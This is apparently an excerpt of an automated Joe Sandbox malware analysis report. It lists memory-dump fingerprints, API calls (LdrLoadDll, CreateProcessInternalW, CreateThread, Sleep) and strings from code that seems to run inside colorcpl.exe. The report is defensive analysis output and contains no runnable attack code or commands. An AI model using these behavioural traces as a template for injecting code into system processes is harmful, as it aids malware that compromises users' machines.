                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 74c8245ee3f3037ee60329c6bbd8e113e68640755636ddf3bfc98983a7f62b02
                                                                                                        • Instruction ID: b8b5c759bc1c8fac7073019edc1aa3e2755c31a06433427d8dc0badc366dc386
                                                                                                        • Opcode Fuzzy Hash: 74c8245ee3f3037ee60329c6bbd8e113e68640755636ddf3bfc98983a7f62b02
                                                                                                        • Instruction Fuzzy Hash: C290027371140803D1807198444464A00158BD1301FD5C015A1025654ECA558B5977A1
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 94e47af0816d1e7ee99250ed741c03e37f379328361c237ff2c8f183c9a7f191
                                                                                                        • Instruction ID: 2e1e6a69dcfc03a322223618b480c7008e69a2a9a0790452852e18fcbbbd07a8
                                                                                                        • Opcode Fuzzy Hash: 94e47af0816d1e7ee99250ed741c03e37f379328361c237ff2c8f183c9a7f191
                                                                                                        • Instruction Fuzzy Hash: E3900267731400030145B598064450B04559BD63513D5C015F2416590DC66189655321
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 9bd7b7141790f24836e81d8e14d646356044101c5172260d5080003344816fc1
                                                                                                        • Instruction ID: 6670eaa17fbc110016038c1bd3db99ffb4bf8907f2da70f9950a9af7c5c9db55
                                                                                                        • Opcode Fuzzy Hash: 9bd7b7141790f24836e81d8e14d646356044101c5172260d5080003344816fc1
                                                                                                        • Instruction Fuzzy Hash: F7900477731400030105F5DC07445070057CFD53513D5C031F3015550DD771CD715131
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: eec3d75ae70cbd7e65dafbf2febcb7f81cd9e40be3fb1a5d63415c43a0c44e8c
                                                                                                        • Instruction ID: b1f0d928e549532ed7620f0305b93ac951d2fcc7b20e57f4143dc5aae8b889d8
                                                                                                        • Opcode Fuzzy Hash: eec3d75ae70cbd7e65dafbf2febcb7f81cd9e40be3fb1a5d63415c43a0c44e8c
                                                                                                        • Instruction Fuzzy Hash: 2D900273B1550403D1007198455470610158BD0301FA5C411A1424568E87D58A5165A2
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: e3372ee12d35162953bcc2968ad7ad441d532e719d87c1620e519bfae843a7f5
                                                                                                        • Instruction ID: 2b310e2265d13c0743725a99bfa2870961f52526a67ac779b926fe83232ecafe
                                                                                                        • Opcode Fuzzy Hash: e3372ee12d35162953bcc2968ad7ad441d532e719d87c1620e519bfae843a7f5
                                                                                                        • Instruction Fuzzy Hash: 3C90026375545103D150719C44446164015ABE0301F95C021A1814594E859589556221

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 535 32238c0-3223908 call 322b270 538 3223a14-3223a1a 535->538 539 322390e-3223988 call 322b350 call 32142f0 call 3201410 call 3221a10 535->539 548 3223990-32239a4 Sleep 539->548 549 32239a6-32239b8 548->549 550 3223a05-3223a0c 548->550 551 32239da-32239f3 call 3225e30 549->551 552 32239ba-32239d8 call 3225d90 549->552 550->548 553 3223a0e 550->553 557 32239f8-32239fb 551->557 552->557 553->538 557->550
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 0322399B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Sleep
                                                                                                        • String ID: net.dll$wininet.dll$+
                                                                                                        • API String ID: 3472027048-3751960166
                                                                                                        • Opcode ID: 23213535b746a26a29b4233231217f69c07ef18052c77a9df65bb315252e32aa
                                                                                                        • Instruction ID: 4a1af7cbbb790ccb60001ac7b7e5bdaa43674976ec06251e22ddca2a5315fef7
                                                                                                        • Opcode Fuzzy Hash: 23213535b746a26a29b4233231217f69c07ef18052c77a9df65bb315252e32aa
                                                                                                        • Instruction Fuzzy Hash: 963173B5A40705BBD714DF64CC84FEBBBB8EB48704F14851CE61D6B240D7B46A808FA4
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeUninitialize
                                                                                                        • String ID: @J7<
                                                                                                        • API String ID: 3442037557-2016760708
                                                                                                        • Opcode ID: a8215ca054d530da2c9e90316dd92191095f6a88469066b6dd7dfbb8439f6d45
                                                                                                        • Instruction ID: 1d3d3c7d57fb29122cc89a8e9e1752577c850d77f199682b0769a18754fbbf32
                                                                                                        • Opcode Fuzzy Hash: a8215ca054d530da2c9e90316dd92191095f6a88469066b6dd7dfbb8439f6d45
                                                                                                        • Instruction Fuzzy Hash: EB3141B6A1060AAFDB00DFD8CD809EFB7B9FF88304B148559E515EB204D775EE458BA0
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeUninitialize
                                                                                                        • String ID: @J7<
                                                                                                        • API String ID: 3442037557-2016760708
                                                                                                        • Opcode ID: 8d9c8f800baec38cd15c166777e743d3820f676bbc6c5c58a286655719c12787
                                                                                                        • Instruction ID: fa1f46afb6a0c8846316d537e02843d1ef5e7f69f68a4725e4b980f2d76c7240
                                                                                                        • Opcode Fuzzy Hash: 8d9c8f800baec38cd15c166777e743d3820f676bbc6c5c58a286655719c12787
                                                                                                        • Instruction Fuzzy Hash: 023154B6A1060AAFDB00DFD8CD809EFB7B9FF48304B148559E515EB204D771EE458BA0
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03214362
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: cabadc429ca9bf0ea4f6f112ad196f5047ef34b7e91932448bc3641e5bf786ad
                                                                                                        • Instruction ID: 240eaf43a681d6786310cae3ca0650a6b29ef2a2217f24bcb18c65183559711d
                                                                                                        • Opcode Fuzzy Hash: cabadc429ca9bf0ea4f6f112ad196f5047ef34b7e91932448bc3641e5bf786ad
                                                                                                        • Instruction Fuzzy Hash: 01015EB9D1020EBBDB10EAA1DD41FAEB7B89B54308F144194EA089B241F670E758CB91
                                                                                                        APIs
                                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,032180BE,00000010,?,?,?,00000044,?,00000010,032180BE,?,?,?), ref: 03229630
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateInternalProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 2186235152-0
                                                                                                        • Opcode ID: 5e95764a33c8cb1fca4e2c6aa4495904ddcd1e1733e80192e71f584631693ad5
                                                                                                        • Instruction ID: 38603589bbdee43a23cf97014ee4fd0e405e097d1429fe4cb39cfdaa65efd93c
                                                                                                        • Opcode Fuzzy Hash: 5e95764a33c8cb1fca4e2c6aa4495904ddcd1e1733e80192e71f584631693ad5
                                                                                                        • Instruction Fuzzy Hash: C901C0B6214608BBCB04DE89DC80EDB77ADEF8C714F408208BA19E7280D630F851CBA4
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03214362
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: 423c684e834905f389e317ff0e0b23f2fa40fc56bd2a3155af97fab3e49be924
                                                                                                        • Instruction ID: 6ee08727176e406b0d6c1c24c3c37bf7bc8a7ea6901039035798412f68a25d76
                                                                                                        • Opcode Fuzzy Hash: 423c684e834905f389e317ff0e0b23f2fa40fc56bd2a3155af97fab3e49be924
                                                                                                        • Instruction Fuzzy Hash: 42F0C27591020AAADF10EBA1DC81F9DB7B8AF14708F584294D8089A141E631E794C791
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03214362
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: b7da9ea4713e95006062604f2f78b917355cdf7c45eb40070df55e5d5004b345
                                                                                                        • Instruction ID: ee5dc1712e026049c394e302f00f05204d2d1a87f5974b202cab688ea39c115a
                                                                                                        • Opcode Fuzzy Hash: b7da9ea4713e95006062604f2f78b917355cdf7c45eb40070df55e5d5004b345
                                                                                                        • Instruction Fuzzy Hash: 45F09E296A9B086BC3119BBA99057C9B7E4FF42900F284198DDC9C6A53E363821AC791
                                                                                                        APIs
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03209DA5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: d9e4531af00abc86503a29f7e8558993c3ae072f053631ad95bb8966d6e57d91
                                                                                                        • Instruction ID: a1612d1923ce4016d423ec2919fb0caf624ccd989053c8db7987683e2bddcd5e
                                                                                                        • Opcode Fuzzy Hash: d9e4531af00abc86503a29f7e8558993c3ae072f053631ad95bb8966d6e57d91
                                                                                                        • Instruction Fuzzy Hash: 63F06D773A431436E720A1A9AC02FDBB79CCB80B61F240425FA0DEB1C1D9E5B89146A5
                                                                                                        APIs
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03209DA5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: 964b0e4da47c8700d6a9d11219176d5b81c11e1b76ac7b25ac9e0a4425ec12f7
                                                                                                        • Instruction ID: 8d0b23c57e29606e948b982564611057464a0425099685291926243b79536826
                                                                                                        • Opcode Fuzzy Hash: 964b0e4da47c8700d6a9d11219176d5b81c11e1b76ac7b25ac9e0a4425ec12f7
                                                                                                        • Instruction Fuzzy Hash: ACF0927769471036E330A1989C02FDB6798CB80B51F240115FA0DFF2D1D9E9B99146A5
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,9403D333,00000007,00000000,00000004,00000000,03213BD5,000000F4), ref: 0322957C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3298025750-0
                                                                                                        • Opcode ID: 27bbdd54da5c965e61241d10b6020c612638fb223b0637cadf89fda0c63e04a5
                                                                                                        • Instruction ID: f4bb1977f33f988ada6f6f1b90ffa6a136b4a315f70bb6f026fdca58cd6645e2
                                                                                                        • Opcode Fuzzy Hash: 27bbdd54da5c965e61241d10b6020c612638fb223b0637cadf89fda0c63e04a5
                                                                                                        • Instruction Fuzzy Hash: 52E06DB56002047FD610EE59DC41E9B37ADDFC5710F004009F908AB241D671B820C6B5
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(03211832,?,?,03211832,032254CF,?,?,03211832,032254CF,00001000), ref: 0322952F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 8e8f804e6e2566f97d4133197ec8a822201c655ac3a2fa4d2fbee59e578fcff7
                                                                                                        • Instruction ID: d892d170e1fedc9bac8eb0e05f43bece48374e9ffdaa4daf483151b7dd624365
                                                                                                        • Opcode Fuzzy Hash: 8e8f804e6e2566f97d4133197ec8a822201c655ac3a2fa4d2fbee59e578fcff7
                                                                                                        • Instruction Fuzzy Hash: DBE065B6200308BFD610EE59DC45F9B77ACEFC9724F404009F908AB281D670B9208AB5
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 0321812C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: 4f6617fd5a62fc4568d9e6c02f66cfbc60d0166b2f88d4bd3319c6be46831a9b
                                                                                                        • Instruction ID: b0b2aca9cfd9c4f497382bb25017ad11d1a4bb1228a61ad91c8d1bfff84e5ec2
                                                                                                        • Opcode Fuzzy Hash: 4f6617fd5a62fc4568d9e6c02f66cfbc60d0166b2f88d4bd3319c6be46831a9b
                                                                                                        • Instruction Fuzzy Hash: 25E0203215030427EF60D5A8DD85F6333889744A74F4C4650FC1CDB6C1D578F4914250
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,03211B30,03227E0E,032254CF,?), ref: 03217F23
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 2340568224-0
                                                                                                        • Opcode ID: 18bff222efdca047364ccdda0dae273c7697e574fba03accafcb5418ebc76b94
                                                                                                        • Instruction ID: e53cf6236fcb8a4fc38ebb70257f5dd2b48e8039cf917ea49191be2f70101fdb
                                                                                                        • Opcode Fuzzy Hash: 18bff222efdca047364ccdda0dae273c7697e574fba03accafcb5418ebc76b94
                                                                                                        • Instruction Fuzzy Hash: 12D05E756A83053BF740E6E58C06F5636CC9B58654F154464FA1CFB2C2ECA9F0A04AA5
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(?,00000111), ref: 03210C17
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 1836367815-0
                                                                                                        • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                        • Instruction ID: 3f16da0c822a7fd032e07549b147e5896790661852d238974be12998015ffd48
                                                                                                        • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                        • Instruction Fuzzy Hash: ADD0237770000C36E60145C46CC1CFFF75CDB88AA5F004063FF08D1040E5214D020BB0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseFind
                                                                                                        • String ID:
                                                                                                        • API String ID: 1863332320-0
                                                                                                        • Opcode ID: 5280d22c022ed015ef66db8bda8d322a9f357da5a1d3dc6d9774782934470552
                                                                                                        • Instruction ID: 7599cc5a7cd133e9d2694361c7c502c1025bf4f4f1af5b2f7e48197fd07e271f
                                                                                                        • Opcode Fuzzy Hash: 5280d22c022ed015ef66db8bda8d322a9f357da5a1d3dc6d9774782934470552
                                                                                                        • Instruction Fuzzy Hash: 89C09B3B76612C4B47015DF5B8C74EDB7A0E795236B2015FAD509C6450E663045646C1
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 52a171d69c60f0daf170f36b96317d3f5bd73d4324a4433f5f89ecd1d0b16678
                                                                                                        • Instruction ID: 115a70ea7010094f31c12b5448f59e075fe71dfd93287ebca0f0c67de412edd1
                                                                                                        • Opcode Fuzzy Hash: 52a171d69c60f0daf170f36b96317d3f5bd73d4324a4433f5f89ecd1d0b16678
                                                                                                        • Instruction Fuzzy Hash: 44B09B73D115D5D6DE15E7604608B1779117FD0701F56C061D3070651F4778D1D1E1B5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158168092.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5140000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                        • API String ID: 0-3558027158
                                                                                                        • Opcode ID: 9f04e1dc506f42f0de9fd4ca82da11d9677e0e2421fe9a9fa01c9eac5faa3e7b
                                                                                                        • Instruction ID: 1481e68642b23343ffa220f4dcba5c108b6b1d60fd58bd785fc8cf4d972d62da
                                                                                                        • Opcode Fuzzy Hash: 9f04e1dc506f42f0de9fd4ca82da11d9677e0e2421fe9a9fa01c9eac5faa3e7b
                                                                                                        • Instruction Fuzzy Hash: 3E915EF04482988AC7158F54A0652AFFFB5EBC6305F15816DE7E6BB243C3BE89058F85
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: aa69cdf2d60a3fda130659a70fb336be9f31f0cbfbbca6d7d1dd7049367c1b92
                                                                                                        • Instruction ID: 37848106ee8fd92345f9e08950619f2130c28ac5919ef8f9eb6176de056b1d74
                                                                                                        • Opcode Fuzzy Hash: aa69cdf2d60a3fda130659a70fb336be9f31f0cbfbbca6d7d1dd7049367c1b92
                                                                                                        • Instruction Fuzzy Hash: AF51C5BAA24117BBDF24DB98889097EFBB9BF08240B50C669E499D7741D374DE4087E0
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: 524a4cc9d017a482e392474aed3d51c5eb61382361212565f647ce13c9b8d914
                                                                                                        • Instruction ID: d774695881216bd9c8a2017ecf2d0f92427712c6ffbd94ee650a21789c42c783
                                                                                                        • Opcode Fuzzy Hash: 524a4cc9d017a482e392474aed3d51c5eb61382361212565f647ce13c9b8d914
                                                                                                        • Instruction Fuzzy Hash: 1751D479A00745AFCB34DF5CC8A897FF7FAAF44200B44985AF496D7681E6B4DA408B60
                                                                                                        Strings
                                                                                                        • Execute=1, xrefs: 052C4713
                                                                                                        • ExecuteOptions, xrefs: 052C46A0
                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 052C4725
                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 052C4787
                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 052C46FC
                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 052C4655
                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 052C4742
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                        • API String ID: 0-484625025
                                                                                                        • Opcode ID: 78bf92ca51b8c232e60ce571cf0cdd4163ab0192d50ec3d67d6b530c658eb6e3
